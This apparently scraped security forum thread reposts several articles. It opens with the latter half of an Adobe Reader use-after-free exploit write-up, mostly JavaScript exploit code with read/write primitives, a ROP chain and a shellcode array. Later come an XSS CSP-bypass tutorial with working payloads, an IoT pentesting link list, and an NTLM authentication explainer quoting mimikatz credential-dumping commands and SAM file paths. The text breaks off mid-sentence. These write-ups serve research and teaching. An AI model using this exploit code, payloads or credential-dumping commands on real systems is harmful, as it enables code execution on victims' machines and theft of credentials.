assert(WRITE_ARRAY_ADDR>0) break } else { FREES_110[i] = null } } Arbitrary Read/Write Primitives To achieve an abritrary read primitive I spray a bunch of fake string objects into the heap, then assign it into our elements buffer. GUESS = 0x20000058 //0x20d00058 /* spray fake strings */ for(var i=0x1100; i<0x1400; i++) { var dv = new DataView(SPRAY[i]) dv.setUint32(0, 0x102, true) //string header dv.setUint32(4, GUESS+12, true) //string buffer, point here to leak back idx 0x20000064 dv.setUint32(8, 0x1f, true) //string length dv.setUint32(12, i, true) //index into SPRAY that is at 0x20000058 delete dv } gc() //app.alert("Create fake string done") /* point one of our element to fake string */ FAKE_ELES[4] = GUESS FAKE_ELES[5] = 0xffffff85 /* create aar primitive */ SPRAY_IDX = s2h(T[2]) console.println('SPRAY_IDX: ' + SPRAY_IDX.toString(16)) assert(SPRAY_IDX>=0) DV = DataView(SPRAY[SPRAY_IDX]) function myread(addr) { //change fake string object's buffer to the address we want to read. DV.setUint32(4, addr, true) return s2h(T[2]) } Similarly to achieve arbitrary write, I create a fake TypedArray. I simply copy WRITE_ARRAY contents and change its SharedArrayRawBuffer pointer. /* create aaw primitive */ for(var i=0; i<32; i++) {DV.setUint32(i*4+16, myread(WRITE_ARRAY_ADDR+i*4), true)} //copy WRITE_ARRAY FAKE_ELES[6] = GUESS+0x10 FAKE_ELES[7] = 0xffffff87 function mywrite(addr, val) { DV.setUint32(96, addr, true) T[3][0] = val } //mywrite(0x200000C8, 0x1337) Gaining Code Execution With arbitrary read/write primitives, I can leak the base address of EScript.API in the TypedArray object’s header. Inside EScript.API there is a very convenient gadget to call VirtualAlloc. //d8c5e69b5ff1cea53d5df4de62588065 - md5sun of EScript.API ESCRIPT_BASE = myread(WRITE_ARRAY_ADDR+12) - 0x02784D0 //data:002784D0 qword_2784D0 dq ? console.println('ESCRIPT_BASE: '+ ESCRIPT_BASE.toString(16)) assert(ESCRIPT_BASE>0) Next I leak the base of address of AcroForm.API and the address of a CTextField (0x60 in size) object. First allocate a bunch of CTextField object using addField then create a string object also with size 0x60, then leak the address of this string (MARK_ADDR). We can safely assume that these CTextField objects will lie behind our MARK_ADDR. Finally I walk the heap to look for CTextField::vftable. /* leak .rdata:007A55BC ; const CTextField::`vftable' */ //f9c59c6cf718d1458b4af7bbada75243 for(var i=0; i<32; i++) this.addField(i, "text", 0, [0,0,0,0]); T[4] = STR_60.toLowerCase() for(var i=32; i<64; i++) this.addField(i, "text", 0, [0,0,0,0]); MARK_ADDR = myread(FAKE_ELES[8]+4) console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) vftable = 0 while (1) { MARK_ADDR += 4 vftable = myread(MARK_ADDR) if ( ((vftable&0xFFFF)==0x55BC) && (((myread(MARK_ADDR+8)&0xff00ffff)>>>0)==0xc0000000)) break } console.println('MARK_ADDR: '+ MARK_ADDR.toString(16)) assert(MARK_ADDR>0) /* leak acroform, icucnv58 base address */ ACROFORM_BASE = vftable-0x07A55BC console.println('ACROFORM_BASE: ' + ACROFORM_BASE.toString(16)) assert(ACROFORM_BASE>0) We can then overwrite CTextField object’s vftable to control PC. Bypassing CFI With CFI enabled, we cannot use ROP. I wrote a small script to look for any module that doesn’t have CFI enabled and is loaded at the time my exploit is running. I found icucnv58.dll. import pefile import os for root, subdirs, files in os.walk(r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader'): for file in files: if file.endswith('.dll') or file.endswith('.exe') or file.endswith('.api'): fpath = os.path.join(root, file) try: pe = pefile.PE(fpath, fast_load=1) except Exception as e: print (e) print ('error', file) if (pe.OPTIONAL_HEADER.DllCharacteristics & 0x4000) == 0: print (file) The icucnv58.dll base address can be leaked via Acroform.API. There is enough gadgets inside icucnv58.dll to perform a stack pivot and ROP. //a86f5089230164fb6359374e70fe1739 - md5sum of `icucnv58.dll` r = myread(ACROFORM_BASE+0xBF2E2C) ICU_BASE = myread(r+16) console.println('ICU_BASE: ' + ICU_BASE.toString(16)) assert(ICU_BASE>0) g1 = ICU_BASE + 0x919d4 + 0x1000//mov esp, ebx ; pop ebx ; ret g2 = ICU_BASE + 0x73e44 + 0x1000//in al, 0 ; add byte ptr [eax], al ; add esp, 0x10 ; ret g3 = ICU_BASE + 0x37e50 + 0x1000//pop esp;ret Last Step Finally, we have everything we need to achieve full code execution. Write the shellcode into memory using the arbitrary write primitive then call VirtualProtect to enable execute permission. The full exploit code can be found at here if you are interested. As a result, the reliability of my UAF exploit can achieved a ~80% success rate. The exploitation takes about 3-5 seconds on average. If there are multiple retries required, the exploitation can take a bit more time. /* copy CTextField vftable */ for(var i=0; i<32; i++) mywrite(GUESS+64+i*4, myread(vftable+i*4)) mywrite(GUESS+64+5*4, g1) //edit one pointer in vftable // // /* 1st rop chain */ mywrite(MARK_ADDR+4, g3) mywrite(MARK_ADDR+8, GUESS+0xbc) // // /* 2nd rop chain */ rop = [ myread(ESCRIPT_BASE + 0x01B0058), //VirtualProtect GUESS+0x120, //return address GUESS+0x120, //buffer 0x1000, //sz 0x40, //new protect GUESS-0x20//old protect ] for(var i=0; i<rop.length;i++) mywrite(GUESS+0xbc+4*i, rop[i]) //shellcode shellcode = [835867240, 1667329123, 1415139921, 1686860336, 2339769483, 1980542347, 814448152, 2338274443, 1545566347, 1948196865, 4270543903, 605009708, 390218413, 2168194903, 1768834421, 4035671071, 469892611, 1018101719, 2425393296] for(var i=0; i<shellcode.length; i++) mywrite(GUESS+0x120+i*4, re(shellcode[i])) /* overwrite real vftable */ mywrite(MARK_ADDR, GUESS+64) Finally with that exploit, we can spawn our Calc. Sursa: https://starlabs.sg/blog/2020/04/tianfu-cup-2019-adobe-reader-exploitation/
-
CodeQL U-Boot Challenge (C/C++) The GitHub Training Team Learn to use CodeQL, a query language that helps find bugs in source code. Find 9 remote code execution vulnerabilities in the open-source project Das U-Boot, and join the growing community of security researchers using CodeQL. Join 182 others! Quickly learn CodeQL, an expressive language for code analysis, which helps you explore source code to find bugs and vulnerabilities. During this beginner-level course, you will learn to write queries in CodeQL and find critical security vulnerabilities that were identified in Das U-Boot, a popular open-source project. What you'll learn Upon completion of the course, you'll be able to: Understand the basic syntax of CodeQL queries Use the standard CodeQL libraries to write queries and explore code written in C/C++ Use predicates and classes, the building blocks of CodeQL queries, to make your queries more expressive and reusable Use the CodeQL data flow and taint tracking libraries to write queries that find real security vulnerabilities What you'll build You will walk in the steps of our security researchers, and create: Several CodeQL queries that look for interesting patterns in C/C++ code. A CodeQL security query that finds 9 critical security vulnerabilities in the Das U-Boot codebase from 2019 (before it was patched!) and can be reused to audit other open-source projects of your choice. Pre-requisites Some knowledge of the C language and standard library. A basic knowledge of secure coding practices is useful to understand the context of this course, and all the consequences of the bugs we'll find, but is not mandatory to learn CodeQL. This is a beginner course. No prior knowledge of CodeQL is required. Audiences Security researchers Developers Sursa: https://lab.github.com/githubtraining/codeql-u-boot-challenge-(cc++)
-
IoT Pentesting 101 && IoT Security 101 Approach Methodology 1. Network 2. Web (Front & Backend and Web services 3. Mobile App (Android & iOS) 4. Wireless Connectivity (Zigbee , WiFi , Bluetooth , etc) 5. Firmware Pentesting (OS of IoT Devices) 6. Hardware Hacking & Fault Injections & SCA Attacks 7. Storage Medium 8. I/O Ports To seen Hacked devices https://blog.exploitee.rs/2018/10/ https://www.exploitee.rs/ https://forum.exploitee.rs/ Your Lenovo Watch X Is Watching You & Sharing What It Learns Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT Smart Bulb Offers Light, Color, Music, and… Data Exfiltration? Besder-IPCamera analysis Smart Lock Subaru Head Unit Jailbreak Jeep Hack Chat groups for IoT Security https://t.me/iotsecurity1011 https://www.reddit.com/r/IoTSecurity101/ https://t.me/hardwareHackingBrasil https://t.me/joinchat/JAMxOg5YzdkGjcF3HmNgQw https://discord.gg/EH9dxT9 Books For IoT Pentesting Android Hacker's Handbook Hacking the Xbox Car hacker's handbook IoT Penetration Testing Cookbook Abusing the Internet of Things Hardware Hacking: Have Fun while Voiding your Warranty Linksys WRT54G Ultimate Hacking Linux Binary Analysis Firmware Hardware Hacking Handbook inside radio attack and defense Blogs for iotpentest https://payatu.com/blog/ http://jcjc-dev.com/ https://w00tsec.blogspot.in/ http://www.devttys0.com/ https://www.rtl-sdr.com/ https://keenlab.tencent.com/en/ https://courk.cc/ https://iotsecuritywiki.com/ https://cybergibbons.com/ http://firmware.re/ https://iotmyway.wordpress.com/ http://blog.k3170makan.com/ https://blog.tclaverie.eu/ http://blog.besimaltinok.com/category/iot-pentest/ https://ctrlu.net/ http://iotpentest.com/ https://blog.attify.com https://duo.com/decipher/ http://www.sp3ctr3.me http://blog.0x42424242.in/ https://dantheiotman.com/ https://blog.danman.eu/ https://quentinkaiser.be/ https://blog.quarkslab.com https://blog.ice9.us/ https://labs.f-secure.com/ https://mg.lol/blog/ https://cjhackerz.net/ Awesome CheatSheets Hardware Hacking Nmap Search Engines for IoT Devices Shodan FOFA Censys Zoomeye ONYPHE CTF For IoT's And Embeddded https://github.com/hackgnar/ble_ctf https://www.microcorruption.com/ https://github.com/Riscure/Rhme-2016 https://github.com/Riscure/Rhme-2017 https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html https://github.com/scriptingxss/IoTGoat YouTube Channels for IoT Pentesting Liveoverflow Binary Adventure EEVBlog JackkTutorials Craig Smith iotpentest [Mr-IoT] Besim ALTINOK - IoT - Hardware - Wireless Ghidra Ninja Cyber Gibbons Vehicle Security Resources https://github.com/jaredthecoder/awesome-vehicle-security IoT security vulnerabilites checking guides Reflecting upon OWASP TOP-10 IoT Vulnerabilities OWASP IoT Top 10 2018 Mapping Project Firmware Pentest Guide Hardware toolkits for IoT security analysis IoT Gateway Software Webthings by Mozilla - RaspberryPi Labs for Practice IoT Goat IoT Pentesting OSes Sigint OS- LTE IMSI Catcher Instatn-gnuradio OS - For Radio Signals Testing AttifyOS - IoT Pentest OS - by Aditya Gupta Ubutnu Best Host Linux for IoT's - Use LTS Internet of Things - Penetration Testing OS Dragon OS - DEBIAN LINUX WITH PREINSTALLED OPEN SOURCE SDR SOFTWARE EmbedOS - Embedded security testing virtual machine Exploitation Tools Expliot - IoT Exploitation framework - by Aseemjakhar A Small, Scalable Open Source RTOS for IoT Embedded Devices Skywave Linux- Software Defined Radio for Global Online Listening Routersploit (Exploitation Framework for Embedded Devices) IoTSecFuzz (comprehensive testing for IoT device) Reverse Engineering Tools IDA Pro GDB Radare2 | cutter Ghidra Introduction Introduction to IoT IoT Architecture IoT attack surface IoT Protocols Overview MQTT Introduction Hacking the IoT with MQTT thoughts about using IoT MQTT for V2V and Connected Car from CES 2014 Nmap The Seven Best MQTT Client Tools A Guide to MQTT by Hacking a Doorbell to send Push Notifications Are smart homes vulnerable to hacking Softwares Mosquitto HiveMQ MQTT Explorer CoAP Introduction CoAP client Tools CoAP Pentest Tools Nmap Automobile CanBus Introduction and protocol Overview PENTESTING VEHICLES WITH CANTOOLZ Building a Car Hacking Development Workbench: Part1 CANToolz - Black-box CAN network analysis framework PLAYING WITH CAN BUS Radio IoT Protocols Overview Understanding Radio Signal Processing Software Defined Radio Gnuradio Creating a flow graph Analysing radio signals Recording specific radio signal Replay Attacks Base transceiver station (BTS) what is base tranceiver station How to Build Your Own Rogue GSM BTS GSM & SS7 Pentesting Introduction to GSM Security GSM Security 2 vulnerabilities in GSM security with USRP B200 Security Testing 4G (LTE) Networks Case Study of SS7/SIGTRAN Assessment Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP ss7MAPer – A SS7 pen testing toolkit Introduction to SIGTRAN and SIGTRAN Licensing SS7 Network Architecture Introduction to SS7 Signaling Breaking LTE on Layer Two Zigbee & Zwave Introduction and protocol Overview Hacking Zigbee Devices with Attify Zigbee Framework Hands-on with RZUSBstick ZigBee & Z-Wave Security Brief BLE Intro and SW & HW Tools Step By Step guide to BLE Understanding and Exploiting Traffic Engineering in a Bluetooth Piconet BLE Characteristics Reconnaissance (Active and Passive) with HCI Tools btproxy hcitool & bluez Testing With GATT Tool Cracking encryption bettercap BtleJuice Bluetooth Smart Man-in-the-Middle framework gattacker BTLEjack Bluetooth Low Energy Swiss army knife Hardware NRFCONNECT - 52840 EDIMAX CSR 4.0 ESP32 - Development and learning Bluetooth Ubertooth Sena 100 BLE Pentesting Tutorials Bluetooth vs BLE Basics Intel Edison as Bluetooth LE — Exploit box How I Reverse Engineered and Exploited a Smart Massager My journey towards Reverse Engineering a Smart Band — Bluetooth-LE RE Bluetooth Smartlocks I hacked MiBand 3 GATTacking Bluetooth Smart Devices Mobile security (Android & iOS) Android App Reverse Engineering 101 Android Application pentesting book Android Pentest Video Course-TutorialsPoint IOS Pentesting OWASP Mobile Security Testing Guide Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals Online Assemblers AZM Online Arm Assembler by Azeria Online Disassembler Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go ARM Azeria Labs ARM EXPLOITATION FOR IoT Damn Vulnerable ARM Router (DVAR) EXPLOIT.EDUCATION Pentesting Firmwares and emulating and analyzing Firmware analysis and reversing Firmware emulation with QEMU Dumping Firmware using Buspirate Reversing ESP8266 Firmware Emulating Embedded Linux Devices with QEMU Emulating Embedded Linux Systems with QEMU Fuzzing Embedded Linux Devices Emulating ARM Router Firmware Reversing Firmware With Radare Samsung Firmware Magic Firmware samples to pentest Download From here IoT hardware Overview IoT Hardware Guide Hardware Gadgets to pentest Bus Pirate EEPROM reader/SOIC Cable Jtagulator/Jtagenum Logic Analyzer The Shikra FaceDancer21 (USB Emulator/USB Fuzzer) RfCat Hak5Gear- Hak5FieldKits Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter Attify Badge - UART, JTAG, SPI, I2C (w/ headers) Attacking Hardware Interfaces Serial Terminal Basics Reverse Engineering Serial Ports REVERSE ENGINEERING ARCHITECTURE AND PINOUT OF CUSTOM ASICS UART Identifying UART interface onewire-over-uart Accessing sensor via UART Using UART to connect to a chinese IP cam A journey into IoT – Hardware hacking: UART JTAG Identifying JTAG interface NAND Glitching Attack\ SideChannel Attacks All Attacks Awesome IoT Pentesting Guides Shodan Pentesting Guide Car Hacking Practical Guide 101 OWASP Firmware Security Testing Methodology Vulnerable IoT and Hardware Applications IoT : https://github.com/Vulcainreo/DVID Safe : https://insinuator.net/2016/01/damn-vulnerable-safe/ Router : https://github.com/praetorian-code/DVRF SCADA : https://www.slideshare.net/phdays/damn-vulnerable-chemical-process PI : https://whitedome.com.au/re4son/sticky-fingers-dv-pi/ SS7 Network: https://www.blackhat.com/asia-17/arsenal.html#damn-vulnerable-ss7-network VoIP : https://www.vulnhub.com/entry/hacklab-vulnvoip,40/ follow the people Jilles Aseem Jakhar Cybergibbons Ilya Shaposhnikov Mark C. A-a-ron Guzman Arun Mane Yashin Mehaboobe Arun Magesh Sursa: https://github.com/V33RU/IoTSecurity101
-
Bypassing modern XSS mitigations with code-reuse attacks Alexander Andersson 2020-04-03 Cyber Security Cross-site Scripting (XSS) has been around for almost two decades yet it is still one of the most common vulnerabilities on the web. Many second-line mechanisms have therefore evolved to mitigate the impact of the seemingly endless flow of new vulnerabilities. Quite often I meet the misconception that these second-line mechanisms can be relied upon as the single protection against XSS. Today we’ll see why this is not the case. We’ll explore a relatively new technique in the area named code-reuse attacks. Code-reuse attacks for the web were first described in 2017 and can be used to bypass most modern browser protections including: HTML sanitizers, WAFs/XSS filters, and most Content Security Policy (CSP) modes. Introduction Let’s do a walkthrough using an example: 1 <?php 2 /* File: index.php */ 3 // CSP disabled for now, will enable later 4 // header("Content-Security-Policy: script-src 'self' 'unsafe-eval'; object-src 'none';"); 5 ?> 6 7 <!DOCTYPE html> 8 <html lang="en"> 9 <body> 10 <div id="app"> 11 </div> 12 <script src="http://127.0.0.1:8000/main.js"></script> 13 </body> 14 </html> 1 /** FILE: main.js **/ 2 var ref=document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); The app has a DOM-based XSS vulnerability. Main.js gets the value of the GET parameter “injectme” and inserts it to the DOM as raw HTML. This is a problem because the user can control the value of the parameter. The user can therefore manipulate the DOM at will. The request below is a proof of concept that proves that we can inject arbitrary JavaScript. Before sending the request we first start a local test environment on port 8000 (php -S 127.0.0.1 8000). 1 http://127.0.0.1:8000/?injectme=<img src="n/a" onerror="alert('XSS')"/> The image element will be inserted into the DOM and it will error during load, which triggers the onerror event handler. This gives an alert popup saying “XSS”, proving that we can make the app run arbitrary JavaScript. Now enable Content Security Policy by removing the comment on line 5 in index.php. Then reload the page you’ll see that the attack failed. If you open the developer console in your browser, you’ll see a message explaining why. Cool! So what happened? The IMG html element was created, the browser saw an onerror event attribute but refused to execute the JavaScript because of the CSP. Bypassing CSP with an unrealistically simple gadget The CSP in our example says that – JavaScript from the same host (self) is allowed – Dangerous functions such as eval are allowed (unsafe-eval) – All other scripts are blocked – All objects are blocked (e.g. flash) We should add that it is always up to the browser to actually respect the CSP. But if it does, we can’t just inject new JavaScript, end of discussion. But what if we could somehow trigger already existing JavaScript code that is within the CSP white list? If so, we might be able to execute arbitrary JavaScript without violating the policy. This is where the concept of gadgets comes in. A script gadget is a piece of legitimate JavaScript code that can be triggered via for example an HTML injection. Let’s look at a simple example of a gadget to understand the basic idea. Assume that the main.js file looked like this instead: 1 /** FILE: main.js **/ 2 var ref = document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); 4 5 document.addEventListener("DOMContentLoaded", function() { 6 var expression = document.getElementById("expression").getAttribute("data"); 7 var parsed = eval(expression); 8 document.getElementById("result").innerHTML = '<p>'+parsed+'</p>'; 9 }); The code is basically the same but this time our target also has some kind of math calculator. Notice that only main.js is changed, index.php is the same as before. You can think of the math function as some legacy code that is not really used. As attackers, we can abuse/reuse the math calculator code to reach an eval and execute JavaScript without violating the CSP. We don’t need to inject JavaScript . We just need to inject an HTML element with the id “expression” and an attribute named “data”. Whatever is inside data will be passed to eval. We give it a shot, and yay! We bypassed the CSP and got an alert! Moving on to realistic script gadgets Websites nowadays include a lot of third-party resources and it is only getting worse. These are all legitimate whitelisted resources even if there is a CSP enforced. Maybe there are interesting gadgets in those millions of lines of JavaScript? Well yes! Lekies et al. (2017) analyzed 16 widely used JavaScript libraries and found that there are multiple gadgets in almost all libraries. There are several types of gadgets, and they can be directly useful or require chaining with other gadgets to be useful. String manipulation gadgets: Useful to bypass pattern-based mitigation. Element construction gadgets: Useful to bypass XSS mitigations, for example to create script elements. Function creation gadgets: Can create new Function objects, that can later be executed by a second gadget. JavaScript execution sink gadgets: Similar to the example we just saw, can either standalone or the final step in a chain Gadgets in expression parsers: These abuse the framework specific expression language used in templates. Let’s take a look at another example. We will use the same app but now let’s include jQuery mobile. 1 <?php 2 /** FILE: index.php **/ 3 header("Content-Security-Policy: script-src 'self' https://code.jquery.com:443 'unsafe-eval'; object-src 'none';"); 4 ?> 5 6 <!DOCTYPE html> 7 <html lang="en"> 8 <body> 9 <p id="app"></p> 10 <script src="http://127.0.0.1:8000/main.js"></script> 11 <script src="https://code.jquery.com/jquery-1.8.3.min.js"></script> 12 <script src="https://code.jquery.com/mobile/1.2.1/jquery.mobile-1.2.1.min.js"></script> 13 </body> 14 </html> 1 /** FILE: main.js **/ 2 var ref = document.location.href.split("?injectme=")[1]; 3 document.getElementById("app").innerHTML = decodeURIComponent(ref); The CSP has been slightly changed to allow anything from code.jquery.com, and luckily for us, jQuery Mobile has a known script gadget that we can use. This gadget can also bypass CSP with strict-dynamic. Let’s start by considering the following html. 1 <div data-role=popup id='hello world'></div> This HTML will trigger code in jQuery Mobile’s Popup Widget. What might not be obvious is that when you create a popup, the library writes the id attribute into an HTML comment. The code in jQuery responsible for this, looks like the below: This is a code gadget that we can abuse to run JavaScript. We just need to break out of the comment and then we can do whatever we want. Our final payload will look like this: 1 <div data-role=popup id='--!><script>alert("XSS")</script>'></div> Execute, and boom! Some final words This has been an introduction to code-reuse attacks on the web and we’ve seen an example of a real-world script gadget in jQuery Mobile. We’ve only seen CSP bypasses but as said, this technique can be used to bypass HTML sanitizers, WAFs, and XSS filters such as NoScript as well. If you are interested in diving deeper I recommend reading the paper from Lekies et al. and specifically looking into gadgets in expression parsers. These gadgets are very powerful as they do not rely on innerHTML or eval. There is no doubt that mitigations such as CSP should be enforced as they raise the bar for exploitation. However, they must never be relied upon as the single layer of defense. Spend your focus on actually fixing your vulnerabilities. The fundamental principle is that you need to properly encode user-controlled data. The characters in need of encoding will vary based on the context in which the data is inserted. For example, there is a difference if you are inserting data inside tags (e.g. <div>HERE</div>), inside a quoted attribute (e.g. <div title=”HERE“></div>), unquoted attribute (e.g. <div title=HERE></div>), or in an event attribute (e.g. <div onmouseenter=”HERE“></div>). Make sure to use a framework that is secure-by-default and read up on the pitfalls in your specific framework. Also never use the dangerous functions that completely bypasses the built-in security, such as trustAsHtml in Angular and dangerouslySetInnerHTML in React. Want to learn more? Except being a Security Consultant performing Penetrationtests, Alexander is a popular instructor. If you want to learn more about XSS Mitigations, Code-reuse attacks and learn how hackers attack your environment, check out his 3 days training: Secure Web Development and Hacking for Developers. Sursa: https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
-
HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties. By James Kettle Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
-
Windows authentication attacks – part 1 In order to understand attacks such as Pass the hash, relaying, Kerberos attacks, one should have pretty good knowledge about the windows Authentication / Authorization process. That’s what we’re going to achieve in this series. In this part we’re discussing the different types of windows hashes and focus on the NTLM authentication process. 10 0 Tweet Share Arabic Table of Contents I illustrated most of the concepts in this blog post in Arabic at the following video This doesn’t contain all the details in the post but yet will get you the fundamentals you need to proceed with the next parts. Windows hashes LM hashes It was the dominating password storing algorithm on windows till windows XP/windows server 2003. It’s disabled by default since windows vista/windows server 2008. LM was a weak hashing algorithm for many reasons, You will figure these reasons out once You know how LM hashing works. LM hash generation? Let’s assume that the user’s password is PassWord 1 – All characters will be converted to upper case PassWord -> PASSWORD 2 – In case the password’s length is less than 14 characters it will be padded with null characters, so its length becomes 14, so the result will be PASSWORD000000 3 – These 14 characters will be split into 2 halves PASSWOR D000000 4 – Each half is converted to bits, and after every 7 bits, a parity bit (0) will be added, so the result would be a 64 bits key. 1101000011 -> 11010000011 As a result, we will get two keys from the 2 pre-generated halves after adding these parity bits 5 – Each of these keys is then used to encrypt the string “KGS!@#$%” using DES algorithm in ECB mode so that the result would be PASSWOR = E52CAC67419A9A22 D000000 = 4A3B108F3FA6CB6D 6 – The output of the two halves is then combined, and that makes out LM hash E52CAC67419A9A224A3B108F3FA6CB6D You can get the same result using the following python line. python -c 'from passlib.hash import lmhash;print lmhash.hash("password")' Disadvantages As you may already think, this is a very weak algorithm, Each hash has a lot of possibilities, for example, the hashes of the following passwords Password1 pAssword1 PASSWORD1 PassWord1 . . . ETC It will be the same!!!! Let’s assume a password like passwordpass123 The upper and lowercase combinations will be more than 32000 possibilities, and all of them will have the same hash! You can give it a try. import itertools len(map(''.join, itertools.product(*zip("Passwordpass123".upper(), "Passwordpass123".lower())))) Also, splitting the password into two halves makes it easier, as the attacker will be trying to brute force just a seven-character password! LM hash accepts only the 95 ASCII characters, but yet all lower case characters are converted to upper case, which makes it only 69 possibilities per character, which makes it just 7.5 trillion possibilities for each half instead of the total of 69^14 for the whole 14 characters. Rainbow tables already exist containing all these possibilities, so cracking Lan Manager hashes isn’t a problem at all Moreover, in case that the password is seven characters or less, the attacker doesn’t need to brute force the 2nd half as it has the fixed value of AAD3B435B51404EE Example Creating hash for password123 and cracking it. You will notice that john got me the password “PASSWORD123” in upper case and not “password123”, and yeah, both are just true. Obviously, the whole LM hashing stuff was based on the fact that no one will reverse it as well as no one will get into the internal network to be in a MITM position to capture it. As mentioned earlier, LM hashes are disabled by default since Windows Vista + Windows server 2008. NTLM hash <NTHash> NTHash AKA NTLM hash is the currently used algorithm for storing passwords on windows systems. While NET-NTLM is the name of the authentication or challenge/response protocol used between the client and the server. If you made a hash dump or pass the hash attack before so no doubt you’ve seen NTLM hash already. You can obtain it via Dumping credentials from memory using mimikatz Eg, sekurlsa::logonpasswords Dumping SAM using C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SAM Then reading hashes offline via Mimikatz lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv And sure via NTDS where NTLM hashes are stored in ActiveDirectory environments, You’re going to need administrator access over the domain controller, A domain admin privs for example You can do this either manually or using DCsync within mimikatz as well NTLM hash generation Converting a plaintext password into NTLM isn’t complicated, it depends mainly on the MD4 hashing algorithm 1 – The password is converted to Unicode 2 – MD4 is then used to convert it to the NTLM Just like MD4(UTF-16-LE(password)) 3 – Even in case of failing to crack the hash, it can be abused using Pass the hash technique as illustrated later. Since there are no salts used while generating the hash, cracking NTLM hash can be done either by using pre-generated rainbow tables or using hashcat. hashcat -m 3000 -a 3 hashes.txt Net-NTLMv1 This isn’t used to store passwords, it’s actually a challenge-response protocol used for client/server authentication in order to avoid sending user’s hash over the network. That’s basically how Net-NTLM authentication works in general. I will discuss how that protocol works in detail, but all you need to know for now is that NET-NTLMv1 isn’t used anymore by default except for some old versions of windows. The NET-NTLMv1 looks like username::hostname:response:response:challenge It can’t be used directly to pass the hash, yet it can be cracked or relayed as I will mention later. Since the challenge is variable, you can’t use rainbow tables against Net-NTLMv1 hash, But you can crack it by brute-forcing the password using hashcat using hashcat -m 5500 -a 3 hashes.txt This differs from NTLMv1-SSP in which the server response is changed at the client-side NTLMv1 and NTLMv1-SSP are treated differently during cracking or even downgrading, this will be discussed at the NTLM attacks part. Net-NTLMv2 A lot of improvements were made for v1, this is the version being used nowadays at windows systems. The authentication steps are the same, except for the challenge-response generation algorithm, and the NTLM challenge length which in this case is variable instead of the fixed 16-bytes number at Net-NTLMv1. At Net-NTLMv2 any parameters are added by the client such as client nonce, server nonce, timestamp as well as the username and encrypt them, that’s why you will find the length of Net-NTLMv2 hashes varies from user to another. Net-NTLMv2 can’t be used for passing the hash attack, or for offline relay attacks due to the security improvements made. But yet it still can be relayed or cracked, the process is slower but yet applicable. I will discuss that later as well. Net-NTLMv2 hash looks like It can be cracked using hashcat -m 5600 hash.txt Net-NTLM Authentication In a nutshell Let’s assume that our client (192.168.18.132) is being used to connect to the windows server 2008 machine (192.168.18.139) That server isn’t domain-joined, means that all the authentication process is going to happen between the client and the server without having to contact any other machines, unlike what may happen in the 2nd scenario. The whole authentication process can be illustrated in the following picture. Client IP : 192.168.18.132 [Kali linux] Server IP: 192.168.18.139 [Windows server 2008 non-domain joined] 0 – The user enters his/her username and password 1 – The client initiates a negotiation request with the server, that request includes any information about the client capabilities as well as the Dialect or the protocols that the client supports. 2 – The server picks up the highest dialect and replies through the Negotiation response message then the authentication starts. 3 – The client then negotiates an authentication session with the server to ask for access, this request contains also some information about the client including the NTLM 8 bytes signature (‘N’, ‘T’, ‘L’, ‘M’, ‘S’, ‘S’, ‘P’, ‘\0’). 4 – The server responds to the request by sending an NTLM challenge 5 – The client then encrypts that challenge with his own pre-entered password’s hash and sends his username, challenge and challenge-response back to the server (another data is being sent while using NetNTLM-v2). 6 – The server tries to encrypt the challenge as well using its own copy of the user’s hash which is stored locally on the server in case of local authentication or pass the information to the domain controller in case of domain authentication, comparing it to the challenge-response, if equal then the login is successful. 1-2 : negotiation request/response launch Wireshark and initiate the negotiation process using the following python lines from impacket.smbconnection import SMBConnection, SMB_DIALECT myconnection = SMBConnection("jnkfo","192.168.18.139") These couple lines represent the 1st two negotiation steps of the previous picture without proceeding with the authentication process. Using the “smb or smb2” filter During the negotiation request, you will notice that the client was negotiating over SMB protocol, and yet the server replied using SMB2 and renegotiated again using SMB2! It’s simply the Dialects. By inspecting the packet you will find the following As mentioned earlier, the client is offering the Dialects it supports and the server picks up whatever it wants to use, by default it picks up the one with the highest level of functionality that both client and server supports. If the best is SMB2 then let it be SMB2. You can, however, enforce a certain dialect (assuming the server supports it) using Myconnection.negotiateSession(preferredDialect=”NT LM 0.12”) The dialect NT LM 0.12 was sent, the server responded back using SMB, and will use the same protocol for the rest of the authentication process. Needless to say that LM response isn’t supported by default anymore since windows vista/windows server 2008. 3 – Session Setup Request (Type 1 message) The following line will initiate the authentication process. myconnection.login("Administrator", "P@ssw0rd") The “Session Setup Request” packet contains information such as the [‘N’, ‘T’, ‘L’, ‘M’, ‘S’, ‘S’, ‘P’, ‘\0’] signature, negotiation flags indicating the options supported by the client and the NTLM Message Type which must be 1 An interesting Flag is the NTLMSSP_NEGOTIATE_TARGET_INFO flag which will ask the server to send back some useful information as will be seen in step number 4 Another interesting flag is the NEGOTIATE_SIGN which has a great deal with the relay attacks as will be mentioned later. 4 – Session Setup Response (Type 2 message) At the response, we get back the NTLMSSP signature again. The message type must be 2 in this case. Target name and the target info due to the NTLMSSP_NEGOTIATE_TARGET_INFO flag we sent earlier which provides us with some wealthy information about the target! A good example is getting the domain name of exchange servers externally. The most important part is the NTLM challenge or nonce. 5 – Session Setup Request (Type 3 message) Long story short, the client needs to prove that he knows the user’s password, without sending the plaintext password or even the NTLM hash directly over the network. So instead it goes through a procedure in which it creates NT-hash, uses this to encrypt the server’s challenge, sends this back along with the user name to the server. That’s how the process works in general. At NTLMv2, The client hashes the user’s pre-entered plain text password into NTLM using the pre-mentioned algorithm to proceed with the challenge-response generation. The elements of the NTLMv2 hash are – The upper-case username – The domain or target name. HMAC-MD5 is applied to this combination using the NTLM hash of the 